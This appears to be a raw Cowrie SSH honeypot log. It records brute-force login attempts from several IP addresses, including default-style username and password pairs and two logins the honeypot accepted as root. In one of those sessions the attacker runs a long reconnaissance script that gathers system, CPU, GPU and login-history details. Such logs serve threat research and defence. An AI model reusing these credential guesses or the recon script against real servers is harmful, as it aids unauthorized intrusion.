{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:08.228533Z","src_ip":"83.168.105.65","session":"86c99b47ad76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52336,"dst_ip":"1.2.3.4","dst_port":22,"session":"f45b37a97641","protocol":"ssh","message":"New connection: 212.227.125.160:52336 (1.2.3.4:22) [session: f45b37a97641]","sensor":"my-vps","timestamp":"2025-08-26T11:58:08.463156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:08.463934Z","src_ip":"212.227.125.160","session":"f45b37a97641"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:08.523261Z","src_ip":"212.227.125.160","session":"f45b37a97641"}
{"eventid":"cowrie.login.failed","username":"opc","password":"opc","message":"login attempt [opc/opc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:09.313779Z","src_ip":"212.227.125.160","session":"f45b37a97641"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:10.437669Z","src_ip":"212.227.125.160","session":"f45b37a97641"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53108,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec830716f399","protocol":"ssh","message":"New connection: 212.227.125.160:53108 (1.2.3.4:22) [session: ec830716f399]","sensor":"my-vps","timestamp":"2025-08-26T11:58:15.151460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:15.158351Z","src_ip":"212.227.125.160","session":"ec830716f399"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:15.203316Z","src_ip":"212.227.125.160","session":"ec830716f399"}
{"eventid":"cowrie.login.failed","username":"dogeman","password":"dogeman","message":"login attempt [dogeman/dogeman] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:15.412644Z","src_ip":"212.227.125.160","session":"ec830716f399"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:16.466843Z","src_ip":"212.227.125.160","session":"ec830716f399"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43110,"dst_ip":"1.2.3.4","dst_port":22,"session":"1af5b3d26516","protocol":"ssh","message":"New connection: 212.227.235.229:43110 (1.2.3.4:22) [session: 1af5b3d26516]","sensor":"my-vps","timestamp":"2025-08-26T11:58:16.832634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:17.155094Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:58:17.155728Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.007945Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:58:19.905296Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.906097Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.906889Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.907837Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.908863Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.909791Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.910629Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.911831Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.912381Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.912876Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.913207Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.913600Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:58:19.914019Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:58:20.379194Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:20.380368Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:20.381468Z","src_ip":"212.227.235.229","session":"1af5b3d26516"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53868,"dst_ip":"1.2.3.4","dst_port":22,"session":"1efdd434c67a","protocol":"ssh","message":"New connection: 212.227.125.160:53868 (1.2.3.4:22) [session: 1efdd434c67a]","sensor":"my-vps","timestamp":"2025-08-26T11:58:20.976066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:21.041168Z","src_ip":"212.227.125.160","session":"1efdd434c67a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:21.041851Z","src_ip":"212.227.125.160","session":"1efdd434c67a"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:21.590303Z","src_ip":"212.227.125.160","session":"1efdd434c67a"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60082,"dst_ip":"1.2.3.4","dst_port":22,"session":"be92b6fea2a0","protocol":"ssh","message":"New connection: 83.168.105.65:60082 (1.2.3.4:22) [session: be92b6fea2a0]","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.414265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.415640Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.452147Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.563659Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:58:22.650819Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.651508Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.654511Z","src_ip":"212.227.125.160","session":"1efdd434c67a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.688777Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:22.689937Z","src_ip":"83.168.105.65","session":"be92b6fea2a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54640,"dst_ip":"1.2.3.4","dst_port":22,"session":"85c7b652a007","protocol":"ssh","message":"New connection: 212.227.125.160:54640 (1.2.3.4:22) [session: 85c7b652a007]","sensor":"my-vps","timestamp":"2025-08-26T11:58:26.514358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:26.515364Z","src_ip":"212.227.125.160","session":"85c7b652a007"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:26.567662Z","src_ip":"212.227.125.160","session":"85c7b652a007"}
{"eventid":"cowrie.login.failed","username":"fivem","password":"fivem","message":"login attempt [fivem/fivem] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:26.737994Z","src_ip":"212.227.125.160","session":"85c7b652a007"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:27.791396Z","src_ip":"212.227.125.160","session":"85c7b652a007"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55410,"dst_ip":"1.2.3.4","dst_port":22,"session":"65b148d0bcaa","protocol":"ssh","message":"New connection: 212.227.125.160:55410 (1.2.3.4:22) [session: 65b148d0bcaa]","sensor":"my-vps","timestamp":"2025-08-26T11:58:31.959915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:31.960903Z","src_ip":"212.227.125.160","session":"65b148d0bcaa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langC